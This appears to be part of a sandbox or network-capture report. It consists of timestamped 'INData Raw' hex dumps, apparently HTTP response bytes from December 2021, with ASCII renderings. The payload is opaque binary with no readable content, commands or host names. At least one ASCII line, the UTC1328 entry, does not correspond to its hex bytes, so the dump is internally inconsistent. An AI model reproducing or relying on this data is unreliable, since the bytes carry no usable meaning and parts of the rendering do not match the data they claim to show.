3b 2c 54 4c ac 9f f3 af 33 64 e0 fc f3 05 06 59 21 06 f8 cf 97 44 8d de 02 fe 8b 97 db 17 0f c7 4f c0 ff 83 df 3e d9 d3 8f e0 ca 66 b6 b6 72 de 53 ca c7 87 93 75 a7 2e d8 25 1b 8a f0 57 da 47 b1 f3 51 7c 0c
                                                                                              Data Ascii: &fC5)Q*5NAt*_KnJ*(Q3&cGN;]smB^D51kL+M)9dkf.mT9Gfse+g3s|^Rxi^Sx*'>!%JY^]&@8b=^G1,k;,TL3dY!DO>frSu.%WGQ|
                                                                                              2021-12-07 12:39:07 UTC1234INData Raw: 43 06 27 66 c0 fd 5f 33 36 e2 24 7a e0 bb ec 28 5d 18 5d c4 47 a8 52 2d cd db c4 19 90 ff ce 4b 27 b2 24 74 f5 f0 99 43 e1 43 fc b9 68 fd 26 06 ed 25 2d e0 ff 3c d1 22 79 f0 46 fc 7b a8 30 66 4c a0 65 42 f7 d0 7a f5 3b 64 9f 9c 32 38 a5 73 1a cd 92 c0 bb ea bc c2 c6 15 7e cc 22 19 47 ae ab 52 1b f8 cf c6 c9 35 da f0 62 06 cd f0 bf ff de 0d 45 b0 c3 e3 ff bb e2 7d 4a 6c 62 98 17 db 4e 23 17 c9 be 6a 26 f5 62 90 99 fb 24 ad e4 57 c1 4e e8 9a 82 f9 9a cd 57 66 79 bc 56 0a a3 5a a9 0d d5 53 94 85 1f 76 70 cd bf 5e d8 3d 69 0d 95 20 bb 51 d9 b6 8a 37 30 60 28 ac 20 21 aa b1 d3 5b 12 14 2c 3a b6 9c af 85 bd f4 8a 2e 63 d0 07 f7 5f 92 e3 6f fd ef 2c 09 50 96 ee df c8 7e 6b ca 59 7d 57 50 56 b7 1f c6 b5 9b 82 de cc 72 b6 96 27 bc 5f 31 cd 2d f0 01 96 0f e4 ff ab
                                                                                              Data Ascii: C'f_36$z(]]GR-K'$tCCh&%-<"yF{0fLeBz;d28s~"GR5bE}JlbN#j&b$WNWfyVZSvp^=i Q70`( ![,:.c_o,P~kY}WPVr'_1-
                                                                                              2021-12-07 12:39:07 UTC1242INData Raw: bf d5 e9 02 17 30 ed 54 d5 0c 6e 3a e3 f6 d5 21 42 39 8f 8a bd 6c 94 45 3e f6 45 46 98 b1 76 5a 0c 2e 98 a4 01 13 c4 e9 48 bb 92 fc ff cd 3f 5e 2b 61 6b 81 f3 3f 2d b6 ed d6 52 97 9e ac 5f 01 15 73 02 68 be 80 f3 4f 87 ad 66 f2 eb 08 8f e5 5d 70 ff 47 41 f5 28 b9 29 75 82 c8 d8 94 79 54 d9 dc 9e ca 24 fc 53 ff 7f a8 7a 0b b6 2c da 36 6c 17 01 91 ee 2e e9 4e e9 94 ee 6e 01 e9 ee ee ee 6e c9 9b ee ee ee 2e 11 51 91 4e e9 50 41 3a d7 c5 f3 7e df 5a db fa 09 c3 3d cc cc 75 9e c7 b1 ef 21 be 74 85 65 7b a0 ff b0 b7 bf 59 2d c8 fb f7 b5 e2 65 fe fa 1e d6 39 e8 ff 5f 4e 9c 6a e8 13 64 1e 6b 3d 92 df 3c 1e 94 45 b3 bf be b5 6a 01 fe 03 fd 5b c0 ff 78 b8 73 4b 69 38 be 02 fd 37 ee 1e 42 ca 1e e7 29 90 ff 5c 27 b3 70 3c cb 34 7a f9 fd f1 91 fa e4 7e 34 9c 1b 9e 70
                                                                                              Data Ascii: 0Tn:!B9lE>EFvZ.H?^+ak?-R_shOf]pGA()uyT$Sz,6l.Nnn.QNPA:~Z=u!te{Y-e9_Njdk=<Ej[xsKi87B)\'p<4z~4p
                                                                                              2021-12-07 12:39:07 UTC1250INData Raw: fd bf 0b 7c ce 00 b6 18 21 65 6e 6a e7 8f 28 30 fa 03 fc 37 77 6c 98 17 fe 9b 56 dd 99 a4 b1 e8 6b 6b 45 d9 37 a4 db 13 19 32 d9 5b 24 6e 30 73 06 e6 f4 67 e6 4b 1d 92 67 3c 3e e2 82 ce 4f 83 b4 4b 50 72 42 a6 16 1a 11 9c e0 f7 e7 e2 25 20 1c 7b 5a e4 11 ac a2 d2 97 d2 d1 4c d6 fc 85 cb 4a 0d fa 9f 5f dc 47 08 bd a2 a5 20 17 b1 01 20 ff a1 ab 13 ce 1a 4b 3f 82 58 ae ee ad ee 8e ed 35 08 e2 4e fc b6 3f 59 d3 1a b5 0e 12 22 8c 34 78 40 ff a7 3d d6 bb 66 9a 0f 6b 10 36 50 88 e4 b2 91 68 2b e6 b7 b1 e9 f5 a0 8c c0 f7 a5 3b f3 e2 3f 61 88 73 e3 6c 7e 7a 7e ef 5b 3d 84 3b 35 39 78 5a 1a a6 12 f2 19 e6 6b 2c 66 81 ff cb 85 b7 c5 6d ef 5e ee df db 3c 34 67 19 2b fb af ac 1d c3 16 39 aa f5 cb ff 30 68 53 f3 dd 30 a4 ff fc dc 5b f4 93 9d 87 8b 91 ce 57 4f 61 f4 4e
                                                                                              Data Ascii: |!enj(07wlVkkE72[$n0sgKg<>OKPrB% {ZLJ_G K?X5N?Y"4x@=fk6Ph+;?asl~z~[=;59xZk,fm^<4g+90hS0[WOaN
                                                                                              2021-12-07 12:39:07 UTC1258INData Raw: e7 60 41 ff 53 90 93 e5 e5 f9 57 a3 f0 cc 8e c9 60 17 71 5d c0 e4 9b 35 b5 df ba f0 92 7f d0 1e d5 08 5c cd 16 91 72 60 be 76 a2 0a ab 1c 6f 33 9f 3f a2 b8 75 cb 1a 39 7a 52 1a af 42 15 a0 fd 94 cc c3 93 21 83 8c f7 49 ab 69 71 69 23 a2 e0 20 89 14 2a c4 ee d7 62 6a 26 f7 be a9 20 da e5 2f cb 45 d3 f3 d0 e6 84 b3 b2 a1 72 8f 83 d4 6b c1 96 93 40 61 21 1c 77 a5 82 aa b4 85 ad d4 a9 a4 a2 91 4b ff e4 1a f0 ef eb ee 81 3e 5f 25 9c 4f 87 e2 a3 9c 09 db 1f 48 72 d9 cc eb b8 f1 9a d4 54 7d 53 2c bf 3f bd 0a 29 cb eb 0f 55 2a 34 ab 20 54 07 67 ca 3d 3c 25 fd a7 6a b1 24 d4 86 f2 2a b4 a4 4c 69 4f d4 a1 90 f3 96 34 bf 0c 5f f9 7f 9f 33 5c bd 04 fe be d1 59 fa e1 cd f0 2c a1 27 e0 d0 be b1 26 a0 87 66 b8 d1 95 d2 d1 85 d8 eb 44 1f f4 84 ec fa 4a a6 d2 47 d3 60 bc
                                                                                              Data Ascii: `ASW`q]5\r`vo3?u9zRB!Iiqi# *bj& /Erk@a!wK>_%OHrT}S,?)U*4 Tg=<%j$*LiO4_3\Y,'&fDJG`
                                                                                              2021-12-07 12:39:07 UTC1266INData Raw: 12 cf e9 0d c7 95 d7 2e 09 1b 49 61 e2 e7 36 9a bd 5e 55 f4 09 e5 57 54 eb 9f 45 cc 69 94 01 ff 61 23 97 44 65 18 81 7c 33 36 f0 3f 40 e7 c3 54 56 aa f9 9b 17 ad c6 61 dd 61 47 a3 25 37 62 8c 84 09 9f a1 ab ac ce fd 82 c6 8d 78 23 27 1c d3 c1 5b d8 7f 06 ed 3b 3c 82 91 20 33 64 cf 6c f8 15 7a 41 07 f9 63 1a 94 6d c5 19 62 52 4e 38 e0 df 9c 51 bc 17 79 f1 5f a4 67 70 34 d5 6d 13 c6 17 15 3c 85 88 af e2 3d 74 6e 63 a5 0d d2 d2 99 d2 d7 17 0b 70 79 ac 8d 5c 8b dd e5 14 cb f9 a9 64 cc df f9 3e 50 24 45 e4 fd 15 f7 c6 85 e8 48 93 6a d8 4d e0 ba be f6 89 a9 fc dd ac 81 38 a6 47 74 a9 c2 1f 07 b9 37 1d 8c 1c 8f 4d f3 65 69 3d 3b 1e 3a cf 01 f9 77 06 94 38 bd 19 ab 07 37 4d fd 40 9a ed 3a c3 fa a9 76 6f 15 97 d0 d2 45 a8 c3 4b 3a aa 1b 07 4d 28 6e 89 a1 f1 99 6e
                                                                                              Data Ascii: .Ia6^UWTEia#De|36?@TVaaG%7bx#'[;< 3dlzAcmbRN8Qy_gp4m<=tncpy\d>P$EHjM8Gt7Mei=;:w87M@:voEK:M(nn
                                                                                              2021-12-07 12:39:07 UTC1273INData Raw: 37 69 bb 6b d0 a7 b4 94 41 ed 9e 0b cb a2 19 e8 88 0b be 84 1c f0 bd f0 3f 0f 50 b3 e8 bf e8 5c cf 3a 2b cf d3 84 2f 66 25 a3 14 7d db 08 4f 08 5c 31 80 64 7c 9b 20 74 0f 83 64 e2 80 fd df 8f 58 9e 23 09 a5 e3 01 fe d3 08 b9 88 8e 22 b0 ff 23 69 ec 47 48 91 fe 84 23 90 21 ef cf 52 77 3a 4d 90 61 f9 f6 22 47 8d c2 d7 ff 10 3b 4e f9 6e 9d d3 ee 8f a1 c9 07 93 e8 42 14 e3 d9 e9 41 64 0a 28 82 06 bc 61 8b e1 6a 16 3a 1c 69 8c de 34 f8 71 9b 7a 7e 04 08 e0 1f 55 05 dd 99 cc ae ad 25 3c 90 4b 56 85 26 18 8e 6b b8 8e 08 a4 20 86 39 e9 ba ab eb 21 ba 2f 16 be e9 37 a3 5d bc ee d9 23 e0 ee 5f 13 e9 05 fd ff f8 17 fe 49 2e c4 36 04 17 f6 d7 a3 8b ab e0 65 69 7d 49 e5 30 9e 8c cc 10 43 e6 a8 d0 e0 28 c8 bf e5 fc 38 97 6f fd 6a 91 e9 f5 d2 ff 4c f8 e2 21 f0 91 4a 70
                                                                                              Data Ascii: 7ikA?P\:+/f%}O\1d| tdX#"#iGH#!Rw:Ma"G;NnBAd(aj:i4qz~U%<KV&k 9!/7]#_I.6ei}I0C(8ojL!Jp
                                                                                              2021-12-07 12:39:07 UTC1281INData Raw: e5 ab 6e 2b cd 73 df 7f fe c7 9b fe a0 fb 00 c0 ff bc 9b 4e 6c 6a 2f 88 be 70 94 7b ff 31 3b e9 bf fd 07 1a 19 49 c6 7a ab 22 0d 23 f2 7b c6 5c 83 ed 7c 3c 84 95 16 b2 8b b2 2e 7d a8 4d 22 df 29 43 4f b6 e1 73 90 7f a3 46 26 d3 ce 15 b7 11 4d 63 7b 89 16 0a 6b 4e 6f 72 f2 a6 4a 97 22 aa 34 be 65 6f 46 5e 3d e0 18 e4 ff 02 fe 5f f1 dc 2a cf 55 96 1e 94 6a 59 c9 6f 1d 85 59 b8 84 f7 40 ff e0 17 71 e7 0a f3 d4 f6 ca bf cf aa d5 51 d6 0d ee f5 02 ef 1f fb 4b 18 cc 98 4a 67 f9 1d 13 34 86 3e 67 99 9c 20 ca 22 2f 1c 5a b6 7e 09 ae 02 62 b9 a3 d6 1d e0 7f 04 b9 84 f7 8c 9f 94 7b ac a3 b2 3e 4a d8 e6 ab 14 fd 7c d5 7f 94 13 f4 3c 07 f4 10 31 08 86 37 58 21 d9 3b c2 31 f2 de 0e a7 54 0c 45 83 fc 27 a4 a0 d5 57 ff af 0c 13 36 8e ed 78 03 04 e8 7f fa d3 07 1f 25 6d
                                                                                              Data Ascii: n+sNlj/p{1;Iz"#{\|<.}M")COsF&Mc{kNorJ"4eoF^=_*UjYoY@qQKJg4>g "/Z~b{>J|<17X!;1TE'W6x%m
                                                                                              2021-12-07 12:39:07 UTC1289INData Raw: 18 13 e5 62 22 0c a0 ef 7c 9d 7f c9 eb be d9 07 fc 2f d1 d2 8f e5 b4 4f 8d 9d ad 70 71 67 6f 77 28 c1 f7 4f 57 29 b2 cd ec f0 4e cd 7e 15 06 cf 6c 35 4f f1 d9 76 a8 23 99 3e 64 dd 64 88 96 0a fb 2a 8b 11 17 c6 82 12 0e f5 02 ec 7f 76 ab f4 e8 cd e5 80 ff f5 91 8b 83 a7 e7 ed 33 d4 1b 8d 71 39 4b 49 36 f2 9e 26 83 26 d7 08 43 7b 96 7c 0e e5 9b 43 ff 4d 6b 2d 0d 22 e7 67 f4 3f 60 fe 1d 4f d4 f4 33 28 3a 26 84 34 5e 37 7b d1 2d 7f a2 35 8b 62 a7 64 68 b5 2f 7f 4d 0d e9 ed d7 a0 1d ea 4e ab c5 77 3f 2d d3 80 fe 77 96 f5 ed 6e a8 11 8b 43 91 bb 7c 96 bc 6d 08 9b 12 ee f0 d5 a2 ec ff cb 7f 9a de 8c 14 5d 3c a2 95 c4 09 ce fe d7 b1 cf 07 e6 5f 47 1e eb ad ab 21 43 db 20 ff e3 f9 77 09 6e 45 c7 72 88 96 3a 45 31 3b 5f 58 b8 53 74 1e f0 ff ef bc 81 1a 60 95 c3 cb
                                                                                              Data Ascii: b"|/Opqgow(OW)N~l5Ov#>dd*v3q9KI6&&C{|CMk-"g?`O3(:&4^7{-5bdh/MNw?-wnC|m]<_G!C wnEr:E1;_XSt`
                                                                                              2021-12-07 12:39:07 UTC1297INData Raw: 56 04 16 43 50 88 5a cf 50 85 2d 88 e0 1e 52 a9 d0 79 c3 fe bd 27 d8 ff c8 d0 0e 9c 17 95 b9 a0 1e 01 fe 27 ff af 36 e8 1f 03 86 21 df 33 fd 14 1f 52 df fe 48 cc f6 b2 39 d7 67 96 0f 08 95 86 e1 23 c1 46 d0 13 17 d7 56 34 a8 ed 1d e5 e2 84 7a 99 3d 51 d8 82 16 db 27 ba 2a ed 0e bd 0a 31 3a be cf dc 48 8f ae f8 9f fe 87 48 57 4e 96 bf cf 91 2c ff 79 d4 0e 62 b6 6d 09 c5 fc a2 42 03 1e 9b 03 82 e8 eb b1 b5 5c 86 d2 4e cb 90 a5 57 f3 d7 f4 a4 5d b5 d6 06 16 34 0d 9a 4c 03 5c 27 9b 4f 7e 64 52 44 07 6e 48 7f 7d 62 f4 c7 a2 db 3b 01 ff 89 54 4a a3 c3 52 7a e2 63 c4 30 65 b5 97 ee e4 a6 d5 e8 87 f5 a7 d5 d3 0b e4 47 08 62 50 ff cc 9e 0f b2 02 ef 6d 9f 7e df 82 fa 3f a1 f2 1f ff 96 72 ba 61 f4 47 16 7c eb 99 42 b9 5e da 29 e6 80 ef 55 05 53 92 ef 41 d7 b8 8d 76
                                                                                              Data Ascii: VCPZP-Ry''6!3RH9g#FV4z=Q'*1:HHWN,ybmB\NW]4L\'O~dRDnH}b;TJRzc0eGbPm~?raG|B^)USAv
                                                                                              2021-12-07 12:39:07 UTC1305INData Raw: 9a 38 cb a1 8c fd dc b9 ab c6 e2 61 23 18 53 c7 bb d3 5f 0b f2 3f 32 83 8e 7a 9e d6 6a 28 b7 f4 de 9a 43 26 65 35 49 53 11 69 30 fc 0e 97 25 76 f5 ae ac 3f f8 38 28 5f 68 f2 75 41 02 f8 ff 22 cd 2f 2f 2f 58 bc 8b 6c 41 fe 9d 38 6e 43 c6 89 38 f1 18 25 c5 7f fa 7f 43 e7 e5 83 5e a9 04 51 55 58 1e 57 34 cb b2 8e ce 4c e0 7f 57 57 52 e3 bb 75 dd ec 9f e4 ac c6 41 11 c1 d1 2d 83 44 aa 78 64 c4 e0 14 13 f8 72 b5 36 48 90 50 86 6a 2a 8f 4c ae 82 08 0f f8 ff 4e dd 18 86 de c4 fb 14 d2 11 12 64 5e 96 9e f9 a5 14 b0 24 31 ff 27 ff 7a bd b3 8b 9b 29 fe ad 7e f5 87 56 e2 f7 8a 66 f3 aa df b2 ec 84 05 b5 d9 b3 d4 c7 88 68 4c 4a 87 91 b3 a8 57 d4 88 22 6a d8 be 59 79 a2 72 1b 5d 41 12 41 08 88 10 7b d3 d2 47 ec e7 fb 67 9f ae 53 ee 54 aa c2 4b a3 f6 2e ca 36 57 06 da
                                                                                              Data Ascii: 8a#S_?2zj(C&e5ISi0%v?8(_huA"///XlA8nC8%C^QUXW4LWWRuA-Dxdr6HPj*LNd^$1'z)~VfhLJW"jYyr]AA{GgSTK.6W
                                                                                              2021-12-07 12:39:07 UTC1312INData Raw: 0e 7e f6 f8 46 4d 87 fc ba 0b 43 f1 22 0b 69 fb 3e f9 8c d9 b0 f9 62 10 2f 0d 06 a7 7a 5e fe ba 4b 34 3e 10 e0 df b0 70 66 f3 99 95 e9 77 4b 83 63 c5 15 b0 b3 3f 77 11 e4 db 16 36 fa 43 0c 8d 07 34 c8 87 17 38 bc cd f9 ec e0 8b cd b6 66 9f 37 50 61 ca 7e c0 d8 70 42 59 39 6b c2 85 7a 57 10 99 1f ec 7b 07 01 fd bb 90 47 22 cd ec 5b 2d 7e eb ea 33 da 18 fc c6 37 e9 7a 0e 89 24 89 27 8d cd ca 7f 19 b8 8f 29 eb c9 b9 be b1 26 53 3e c1 0c 2e 75 77 1e 0d 94 90 0d 5a d1 93 51 a1 a5 a9 bb 5d 53 ec 0b a7 8b 9d 21 6a f3 52 77 19 2f 04 97 93 32 bd 81 ea a3 89 5a 53 39 41 85 0b 12 d4 96 17 5d cb 6b 17 53 53 7e cb e0 22 29 07 f4 4f c2 be 33 ad fe 9c 8e f3 44 7e fc c0 04 d9 7f bd ec 8f 55 82 da e0 70 5e 9f a0 4b bc 77 96 24 ed 5e fc b3 56 c7 ba 93 38 65 fe bf fc 17 1a
                                                                                              Data Ascii: ~FMC"i>b/z^K4>pfwKc?w6C48f7Pa~pBY9kzW{G"[-~37z$')&S>.uwZQ]S!jRw/2ZS9A]kSS~")O3D~Up^Kw$^V8e
                                                                                              2021-12-07 12:39:07 UTC1320INData Raw: 15 4d 6e 24 38 10 a1 6e 48 f1 42 0c 2e 3f 22 3f c0 c6 09 2d ed a7 84 7b b2 c3 c6 42 e9 b1 c2 b1 56 76 46 c2 dc c0 cb 4b 9e b4 7a 84 80 22 59 5e 71 a4 14 1b fe 69 18 94 af e8 35 9b bc 05 2a 28 b8 dc a1 40 ff 45 a2 8d de 35 7a cc 0f d4 3f 37 94 fb d0 56 e6 4d b9 9a bc e7 fb 2a 66 3b b3 b8 2f e1 0e 77 1f de b1 7b a6 b8 72 ca 1d 63 ff 46 08 ad f6 b9 ff 6b ac be 03 fc af ad 5f 87 d4 4d 87 07 02 fd 5b 15 79 43 e8 0f 61 22 c2 b6 8a 77 3d 81 91 c0 ff 6e 27 d9 d3 62 de 90 45 e3 25 26 ab 74 76 32 d8 ff 92 36 7f f6 23 19 45 52 c9 ab 0f 05 fc 1f 6c b6 1e b1 70 ce 90 58 b0 ff 76 82 b8 c3 96 20 c1 cc 66 39 80 42 e9 59 79 99 ef cd 18 55 d0 96 f9 ae cb 94 4d 29 fd 5d c1 0b 77 6b b9 68 29 d7 a6 4b bb c8 b5 73 85 89 5d bd 2c 11 92 44 a4 7e 0d 1d 0e 05 bd 49 21 a0 ff ce 5a
                                                                                              Data Ascii: Mn$8nHB.?"?-{BVvFKz"Y^qi5*(@E5z?7VM*f;/w{rcFk_M[yCa"w=n'bE%&tv26#ERlpXv f9BYyUM)]wkh)Ks],D~I!Z
                                                                                              2021-12-07 12:39:07 UTC1328INData Raw: d1 ab 0e 24 1c d9 9c bd f2 5a 64 d3 b0 d4 97 f4 ac 80 ff a8 81 15 02 e2 df 32 f1 0a 7d 50 24 88 7f 95 f5 26 7f 4d df 51 bb f1 fc 4c bb af 02 fa 57 22 e1 29 dc 94 cc f6 df 8f 80 fe 29 db 5c e6 5b 1b 7c 2b a7 ee 15 d2 0f 2a 99 6d 2d 46 e1 cb 16 f6 46 50 56 11 8c 32 4f 36 5d 82 10 fd 27 73 22 f5 b7 2b d9 bc 8d 36 0c 8f 00 ff 44 a8 c7 4e dc 0c e0 ec 75 76 02 fe 9f df bf f8 41 81 fb c7 13 c8 21 e1 4c 7f 5d 40 05 f4 df f4 26 41 fe 23 fd cd a7 08 f1 bf 8d f9 09 58 5f a2 3f c1 fe 5f 59 0c ce e4 a9 54 2e b1 a8 03 13 e0 bf 00 f6 d2 c0 65 c5 d1 e1 d5 ee 61 13 a6 f0 9d d1 16 3e e4 fb b7 5b ef d1 fb f5 6e 9b d5 cd 1d f7 98 e6 22 42 a4 d8 14 9c df 53 a5 70 65 d9 6c 91 d7 12 c9 80 f9 b0 5d 5b c1 27 6a 82 48 fd 0e 01 ee 5b 11 52 75 00 a8 7f 92 b3 13 22 aa 36 9e 0b cd 17
                                                                                              Data Ascii: g/Tn( %vunFROZEI8_O!]mQw&$o/hk[Y~yLoNtw1 .Kv7{`{N0,gq6cn#c?>SCZO$Ge>cdo81'B":bKg*a?XCrs]IbZ<*q
                                                                                              2021-12-07 12:39:07 UTC1602INData Raw: 64 bf c9 17 66 8d fc c3 ff ae 6b fa 6e a0 cd e0 9e 81 60 ff 6b 83 10 e2 7f af 8d 24 69 a2 1d 13 c1 fc d3 1a 16 8d be 52 6c 2f ec b1 fb 1d ad a5 ea e3 0f f4 7f 68 31 ed 40 ff 52 41 d4 81 68 57 42 6e 48 f9 0e a5 5a 6c 6c ed 00 e0 7f 95 29 3e 83 f7 4f e9 77 a7 83 66 e7 c2 1b 0b 24 fa cf fc 1b bf ff e5 a7 ed 75 e5 1e d0 ff c4 4c 81 f9 4f 54 4b 3c e0 7f 49 d8 79 a9 69 65 61 8c 5b 34 ad d2 99 80 ff 64 6f 0a c7 08 00 fe b3 09 ba 7f 14 21 d7 98 23 28 67 13 91 5d 58 ec d1 2f 2e ba e1 fc bd 33 67 31 50 9e 98 0d ba 7f 5e f0 97 89 53 08 fa 80 bf 7f a6 89 f3 05 fb af 9f fa 30 02 0e 40 ff a8 4e 76 f2 f3 9c 91 03 77 fb ba 89 4a 35 0d d0 ff 7b 8a 8f 7f 45 d9 70 07 77 1e ce d0 6b d7 31 5d 33 25 de 9c 92 92 83 1d b2 3c 95 19 64 2d b0 a8 ae ea cb 5e d0 fd f3 32 b0 7f f0 c6
                                                                                              Data Ascii: dfkn`k$iRl/h1@RAhWBnHZll)>Owf$uLOTK<Iyiea[4do!#(g]X/.3g1P^S0@NvwJ5{Epwk1]3%<d-^2
                                                                                              2021-12-07 12:39:07 UTC1609INData Raw: 48 6f 3e 16 ee 29 87 fc 1f 86 f7 7f d9 a4 59 fc fb 8f c1 35 81 fa 77 aa f1 29 9a 04 8f bf 18 e4 bf 01 c2 23 90 ff fa 02 27 ff 4b fe 33 06 f5 9f 30 a8 ff 67 44 4d 80 fe 6f 35 de fe 45 66 be 7f f2 9f 0c 5a 39 cc 53 58 06 b6 88 ee 53 5d f4 8f af c0 80 fa 7f d9 fc 97 82 95 c3 03 1f 19 b9 b0 8c 73 ff b2 bf 9e 3c d4 ff 30 22 78 77 a4 81 fd 8d 45 57 04 42 91 e4 40 ff d7 1c e4 7f 0f af 8b 70 4a 6e 91 bf ed 9f 68 06 d9 bf 23 96 9e 51 26 d6 41 da ff 29 f9 6e 4a 7f 39 d0 ff ad c7 bd 05 f5 bf 64 67 29 c0 7f c0 76 fa 6f fc 17 f0 f8 57 c0 fe 57 1d e5 27 3c fe 0f 3e 25 72 ef 0d 84 e2 a8 50 df fe bc ff bd 58 e8 fd 0f 1b 9d e2 91 0e ba 88 db a7 86 f8 0f 4a 34 8f 06 36 5c 17 e0 ff fd fe 49 57 20 ff ff 00 e2 3f 13 f5 8b d4 b1 e6 e6 d1 75 4d 7e d0 ff 74 7b c6 8b 5a 00 fc 08
                                                                                              Data Ascii: Ho>)Y5w)#'K30gDMo5EfZ9SXS]s<0"xwEWB@pJnh#Q&A)nJ9dg)voWW'<>%rPXJ46\IW ?uM~t{Z
                                                                                              2021-12-07 12:39:07 UTC1617INData Raw: 7d 66 f6 fa 9a 08 e5 66 36 b4 ff 94 14 d3 2e 5a 6a 90 8f 9f ff 7d 62 51 ba a2 33 1a c4 d1 86 9f ff 7d e3 51 d7 d4 a4 df 3c 56 c1 df 3f 21 34 6e 7b 7c 68 6c 52 66 c3 ef 7f 4c cd 70 0d b8 09 b7 14 fc e6 bf d5 60 4c 49 ec 04 f0 0a 76 fc fc 37 bc f4 11 e1 57 b4 73 c3 7b 3c ff 93 d8 2d 1f 27 2c ba 71 9c 85 df ff 12 43 9f 88 2d 4b bf 11 0a c3 ef 3f 6b 29 dc 98 71 78 f6 bd fa 38 43 37 16 ca 7f 4e fb aa 92 73 cb df f0 f7 ff 25 f5 40 ff 6e 76 3d 17 d2 bf 6b a4 87 ee 5f 16 de 43 f7 ff db 02 90 ff 0f e8 ed 99 ee b5 10 dd 82 ee bf 36 8b 20 fe 27 27 a3 55 fa 1b ca b6 4d b9 df 1f b3 31 00 e9 9f 0c 09 42 fe ff 85 0e e2 7f a8 0e a8 d6 c6 8a ca 9f d7 74 2a 21 ef e6 e9 88 8c 14 9e 07 f7 6f 32 02 4f 97 13 40 fc 13 b4 1c 88 8b 40 bd a0 e2 65 99 12 30 31 f5 19 44 a9 89 70 43
                                                                                              Data Ascii: }ff6.Zj}bQ3}Q<V?!4n{|hlRfLp`LIv7Ws{<-',qC-K?k)qx8C7Ns%@nv=k_C6 ''UM1Bt*!o2O@@e01DpC
                                                                                              2021-12-07 12:39:07 UTC1625INData Raw: e2 a0 c4 c3 a4 b3 66 0c a0 71 84 ef 5f f0 2c 8c bf 62 8a a8 a1 16 c6 eb 46 48 76 3b fd 32 09 e2 1e a4 27 7b d3 b6 02 c3 bd ad 76 89 da c3 ed e9 82 86 52 ad 13 37 a5 91 3b 81 86 3e 9c ee 23 f5 df fb f0 9e 09 cf e6 78 11 fa ba 75 db 5c 95 14 69 ca 75 78 e4 51 14 87 96 59 7c 3e ee bc d9 9c d3 5c f3 67 87 2b d6 f9 6b 71 b4 ec 0b d1 65 45 5e 83 ea be dc e1 1d b4 aa 02 dc 79 da d3 b7 3b ac 07 de 46 09 a9 27 4b f1 9a 6f d4 48 a4 df 5d 33 79 e9 f5 6d a8 c5 b0 9f e0 c0 16 0d 99 74 27 4f 37 ac 26 11 35 d4 86 50 db b2 97 47 2f 19 87 52 31 47 83 c2 34 6f 93 29 13 0d b5 46 ad 3f 39 ff 9d c4 64 71 21 7f 00 ce 45 9a c4 7e 6e b5 a1 72 91 4f 57 53 1f af 87 3c 26 3b 2e 9c f9 58 55 61 ac 95 ab 3b 3b c1 ec 4c 77 54 aa ec 3b d3 4c 27 b4 5b ae 5a e9 9c 3b 37 f6 35 e2 76 64 bc
                                                                                              Data Ascii: fq_,bFHv;2'{vR7;>#xu\iuxQY|>\g+kqeE^y;F'KoH]3ymt'O7&5PG/R1G4o)F?9dq!E~nrOWS<&;.XUa;;LwT;L'[Z;75vd
                                                                                              2021-12-07 12:39:07 UTC1633INData Raw: 8d ea 69 d5 ad e5 23 5e cc 16 34 bd bd f2 6f 96 2e 59 52 da ef 0f c5 3a 2b d3 1c e7 49 99 5e 86 48 3b e8 b4 b2 e6 37 30 dc 12 ca 98 3d 62 fa 99 2c d4 d8 83 bd 56 3e e7 ac 81 fd da 9e 94 e6 d5 32 62 e7 de 42 ea ae 1d ed fb 85 d0 fd eb c3 07 ba a8 66 bc 32 08 ee d8 31 2e 24 3b 15 c2 4a 9e 16 ea 8e 0c f0 bf 2f 32 3c 07 fe a7 7a 1e af 24 64 92 4b f0 b2 45 b9 aa 4a 8f 43 0b 63 80 ff 06 2e 93 5e d3 bc e5 fb ae 4b 38 7c dd 84 9d e0 ff 9e 8a 10 d2 24 36 7f d4 eb e8 56 c0 8e c9 48 ac 53 e9 ee ab 7f af 71 11 eb 05 f8 3f bb 10 58 46 f0 90 33 01 ff 2c 50 f4 0b ef e6 90 0d f8 5f b3 82 ff f5 be e3 e7 8e 1a 45 1e f0 bf a5 c0 21 5f d5 d8 b4 92 10 b5 5b e8 f8 cc e7 eb 48 ca 1d 94 5d 88 f7 dc 9b 9e 6d fc 94 ff 7d 78 7e 61 e4 9e e7 ce 86 2a 73 07 95 8e b5 ac 07 7b 35 52 95
                                                                                              Data Ascii: i#^4o.YR:+I^H;70=b,V>2bBf21.$;J/2<z$dKEJCc.^K8|$6VHSq?XF3,P_E!_[H]m}x~a*s{5R
                                                                                              2021-12-07 12:39:07 UTC1641INData Raw: fe 57 37 be b0 48 0a f3 ff 1c b8 ff 91 02 fd 56 4a 5c ec 5e 88 38 f9 e7 de 6f 4b 56 89 22 58 f3 0d b3 a5 2c 2e 1a 7a 54 49 f4 25 c7 e2 05 88 4a 57 6d 9f be 7f 89 fa 18 7f 15 de 7f 6a f0 d2 ed 63 2d a1 f1 91 10 52 a3 3d e2 c3 41 e0 69 5e 35 57 28 0a 76 9b 80 f7 0f dc 3a 21 ee 52 fa a8 f0 fe c5 46 5c c3 ab 86 20 1c ee 7f f8 22 2e c0 fb b7 4b 70 ff 43 0f e7 5f 11 e8 17 01 fd 17 ce e2 1f 86 43 b8 8a ef 97 9c 8b b4 93 ec 10 81 f8 b7 c0 fb 87 2c b8 ff e9 80 f7 0f 2d 90 ff 29 e0 fe db 45 54 1a ea 3f 65 36 34 95 99 51 76 05 d5 66 07 5d 22 a6 45 3f e2 0a 52 42 4b 56 b2 3a 78 ff f3 fe 11 e8 8f 85 f7 bf 23 a8 c1 30 ff 98 f2 a5 80 fb 2f 11 ea 28 02 97 44 39 b8 ff 6b 51 d2 38 bb ff 60 e4 b1 28 dc d1 7e 5d 61 68 aa 0d e7 7f ae 4d 1e ac 7f 76 58 ff d9 81 c6 5c 57 d9 c3
                                                                                              Data Ascii: W7HVJ\^8oKV"X,.zTI%JWmjc-R=Ai^5W(v:!RF\ ".KpC_C,-)ET?e64Qvf]"E?RBKV:x#0/(D9kQ8`(~]ahMvX\W
